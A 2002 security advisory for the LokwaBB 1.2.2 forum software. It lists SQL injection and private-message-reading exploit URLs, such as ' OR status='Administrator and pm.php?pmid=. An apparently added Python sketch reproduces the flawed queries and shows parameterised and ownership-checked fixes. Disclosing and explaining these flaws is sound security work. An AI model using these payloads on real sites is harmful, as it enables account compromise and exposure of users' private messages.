
LokwaBB XSS, private messages reading and SQL Injection
14th Jun 2002 [SBWID-5451]
COMMAND

	LokwaBB XSS, private messages reading and SQL Injection

SYSTEMS AFFECTED

	LokwaBB 1.2.2

PROBLEM

	frog-m@n [leseulfrog@hotmail.com] found XSS, private messages reading
	and SQL Injection in LokwaBB [http://lokwa.farcom.com/].

	 Exploit
	 =======

	- http://[target]/member.php?action=viewpro&member=\'%20OR%20password=\'PASSWORD
	- http://[target]/member.php?action=viewpro&member=\'%20OR%20status=\'Administrator
	- misc.php?action=forgot&send=yes&loser=\'%20OR%20password=\'PASSWORD
	- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

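The URLs above imply two defects: the `member` and `loser` parameters are spliced into a SQL string unquoted, so a value like `' OR status='Administrator` widens the WHERE clause, and `pm.php` looks a message up by `pmid` alone, so any logged-in user can read another user's private message. The Python sketch below is an added example, not code from LokwaBB or from the advisory's author; it reproduces both query patterns and their fixes against an in-memory SQLite database with constructed sample rows. The table and column names (`members`, `pms`, `recipient`) are assumptions, since LokwaBB's real schema is not given here, and the advisory does not say where the XSS occurs, so that is not modelled.

```python
import sqlite3

# Constructed sample data standing in for LokwaBB's tables (assumed schema).
# Only the parameter names member/password/status/pmid come from the advisory.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members (username TEXT, password TEXT, status TEXT);
        INSERT INTO members VALUES ('alice', 'sekret1', 'Administrator');
        INSERT INTO members VALUES ('bob',   'hunter2', 'Member');
        CREATE TABLE pms (pmid INTEGER, recipient TEXT, body TEXT);
        INSERT INTO pms VALUES (1, 'alice', 'hello alice');
        INSERT INTO pms VALUES (2, 'bob',   'hello bob');
    """)
    return db

# The status payload shown in the advisory's second URL (URL-decoded).
ADVISORY_STATUS_PAYLOAD = "' OR status='Administrator"

def viewpro_vulnerable(db, member):
    # String concatenation: the quote in the payload closes the literal and
    # the rest becomes part of the WHERE clause, matching every Administrator.
    sql = "SELECT username, status FROM members WHERE username='" + member + "'"
    return db.execute(sql).fetchall()

def viewpro_fixed(db, member):
    # Parameter binding: the value is sent as data, never parsed as SQL,
    # so the same payload simply matches no username.
    sql = "SELECT username, status FROM members WHERE username=?"
    return db.execute(sql, (member,)).fetchall()

def pm_reply_vulnerable(db, pmid):
    # Lookup by message id only: whoever supplies a valid pmid gets the body.
    return db.execute("SELECT body FROM pms WHERE pmid=?", (pmid,)).fetchone()

def pm_reply_fixed(db, pmid, current_user):
    # Ownership is part of the query: a message that is not addressed to the
    # requesting user yields no row, regardless of the pmid supplied.
    sql = "SELECT body FROM pms WHERE pmid=? AND recipient=?"
    return db.execute(sql, (pmid, current_user)).fetchone()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable viewpro:", viewpro_vulnerable(db, ADVISORY_STATUS_PAYLOAD))
    print("fixed viewpro:     ", viewpro_fixed(db, ADVISORY_STATUS_PAYLOAD))
    print("vulnerable pm read by bob:", pm_reply_vulnerable(db, 1))
    print("fixed pm read by bob:     ", pm_reply_fixed(db, 1, "bob"))
```

The fix for the `forgot` password form is the same binding change as `viewpro_fixed`; the point of the `pm_reply_fixed` variant is that binding alone does not help there, because the query is syntactically safe and the flaw is a missing authorization predicate.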

	More details in French:

	http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

	Translated by Google:

	http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools


SOLUTION

	Nothing yet.
